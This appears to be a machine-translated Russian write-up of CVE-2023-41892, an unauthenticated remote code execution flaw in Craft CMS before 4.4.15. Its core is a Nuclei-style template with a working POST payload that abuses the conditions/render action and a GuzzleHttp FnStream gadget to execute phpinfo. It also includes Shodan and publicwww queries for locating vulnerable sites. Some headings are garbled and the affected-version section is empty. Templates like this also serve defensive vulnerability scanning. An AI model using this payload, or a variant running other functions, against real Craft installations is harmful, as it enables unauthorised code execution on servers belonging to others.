0x00 Предисловие
0x01 Описание уязвимости
Craft CMS — это платформа для создания цифрового опыта. Это мощный вектор атаки с низкой сложностью. Пользователям, использующим установки Craft до версии 4.4.15, рекомендуется выполнить обновление как минимум до этой версии, чтобы устранить проблему. Эта проблема исправлена в Craft CMS 4.4.15.
0x02 номер CVE
CVE-2023-41892
0x03 затронутая версия
0x04 Подробности об уязвимости
id: CVE-2023-41892
info:
name: CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
reference:
- https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
- https://blog.calif.io/p/craftcms-rce
- https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical
- https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857
- https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
cvss-score: 10
cve-id: CVE-2023-41892
cwe-id: CWE-94
epss-score: 0.00044
epss-percentile: 0.08209
metadata:
max-request: 1
verified: true
publicwww-query: "craftcms"
shodan-query: http.favicon.hash:-47932290
tags: cve,cve2023,rce,unauth,craftcms
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
matchers:
- type: word
words:
- "PHP Credits"
- "PHP Group"
- "CraftCMS"
condition: and
case-insensitive: true
ссылка на ссылку 0x05
https://nvd.nist.gov/vuln/detail/CVE-2023-41892